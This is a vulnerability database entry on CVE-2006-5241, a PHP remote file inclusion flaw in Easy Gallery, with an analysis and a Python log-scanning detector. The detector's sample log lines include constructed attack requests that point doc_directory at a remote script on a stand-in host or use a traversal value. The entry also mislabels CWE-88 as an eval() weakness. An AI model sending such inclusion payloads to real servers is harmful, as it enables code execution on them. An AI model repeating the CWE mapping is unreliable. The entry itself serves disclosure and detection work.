CVE-2006-5241 in Easy Gallery
Summary
by MITRE
Multiple PHP remote file inclusion vulnerabilities in OpenDock Easy Gallery 1.4 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the doc_directory parameter in (1) file.php; (2) find_user.php, (3) lib_user.php, (4) lib_form_user.php, and (5) user.php in sw/lib_user/; (6) find_session.php and (7) session.php in sw/lib_session/; (8) comment.php and (9) lib_comment.php in sw/lib_comment/; and other unspecified PHP scripts.
Analysis
by VulDB Data Team • 04/24/2026
CVE-2006-5241 is a critical remote code execution flaw affecting OpenDock Easy Gallery versions 1.4 and earlier. It stems from improper input validation and unsafe parameter handling in multiple PHP scripts that form the core functionality of the gallery system. Exploitation depends on the combination of register_globals being enabled and the absence of proper sanitization for user-supplied input parameters.
The technical flaw manifests through the doc_directory parameter, which is directly incorporated into PHP include or require statements without adequate validation or sanitization. When register_globals is enabled, user-supplied values are automatically injected into the global scope, so an attacker who controls the doc_directory parameter can manipulate script execution flow. This creates a classic remote file inclusion vulnerability where malicious actors can inject URLs pointing to external PHP scripts, effectively allowing arbitrary code execution on the target server.
The operational impact of this vulnerability is severe and far-reaching as it provides attackers with complete control over the affected system. Once exploited, an attacker can execute arbitrary PHP code with the privileges of the web server process, potentially leading to data theft, system compromise, or further lateral movement within the network. The vulnerability affects multiple core scripts across different library directories, indicating a systemic design flaw rather than an isolated issue, which amplifies the risk and attack surface. This widespread impact across various PHP scripts within the application demonstrates poor input validation practices throughout the codebase.
The vulnerability aligns with CWE-88, which describes improper neutralization of special elements used in an eval() context, and CWE-94, covering improper control of generation of code. From an ATT&CK framework perspective, this vulnerability maps to T1190 - Exploit Public-Facing Application, where attackers leverage web application vulnerabilities to gain unauthorized access. The attack chain typically involves reconnaissance to identify the vulnerable application, crafting malicious payloads with specially formatted URLs, and executing the exploit to achieve remote code execution. Organizations should implement immediate mitigations including disabling register_globals in php.ini, implementing proper input validation and sanitization for all user-supplied parameters, and applying the latest security patches from the vendor. Network segmentation and web application firewalls can provide additional defense-in-depth measures to detect and prevent exploitation attempts.
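As an added example for the detection side of these mitigations (not VulDB's or the vendor's code), the following sketch scans web access log lines for requests that set doc_directory and marks those whose value is a remote URL. The combined log format, the /gallery/ prefix, the sample entries and the function names are assumptions, as is the premise that a client has no legitimate reason to send this parameter.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

PARAM = "doc_directory"
# Scripts named in the CVE description; it says other, unspecified scripts are affected too.
LISTED = {"file.php", "find_user.php", "lib_user.php", "lib_form_user.php", "user.php",
          "find_session.php", "session.php", "comment.php", "lib_comment.php"}
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# A value starting with "scheme:" or "//host" points the include at a remote resource.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]+:|//)", re.I)

# Constructed sample entries (documentation addresses, hypothetical /gallery/ prefix).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /gallery/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /gallery/sw/lib_user/user.php'
    '?doc_directory=http%3A%2F%2Fexample.invalid%2Fx.txt%3F HTTP/1.1" 200 312',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /gallery/sw/lib_session/session.php'
    '?doc_directory=../../ HTTP/1.1" 200 0',
    '192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET /gallery/search.php?q=doc_directory HTTP/1.1" 200 900',
]

def classify(line):
    """Return a finding dict if the request sets doc_directory, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qsl percent-decodes names and values once, so doc%5Fdirectory is caught too.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key == PARAM:
            value = unquote(value)  # undo one extra layer of percent-encoding
            return {
                "path": parts.path,
                "value": value,
                "remote": bool(REMOTE.match(value)),
                "listed_script": parts.path.rsplit("/", 1)[-1] in LISTED,
            }
    return None

def scan(lines):
    """Return findings for every log line that carries the parameter."""
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        label = "REMOTE-URL" if hit["remote"] else "OVERRIDE"
        print(label, hit["path"], "->", hit["value"])
```

Access logs record only the query string, while register_globals also populates variables from POST bodies and cookies, so this check covers one of the channels through which doc_directory can be set.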
The vulnerability demonstrates how legacy security configurations like register_globals can create dangerous attack vectors when combined with insufficient input validation. Modern security practices strongly discourage enabling register_globals due to its inherent risks, and this vulnerability serves as a historical example of why such configurations should be avoided in production environments. The widespread nature of the affected files indicates that the application's architecture lacked proper security controls, making it vulnerable to multiple attack points rather than a single isolated flaw.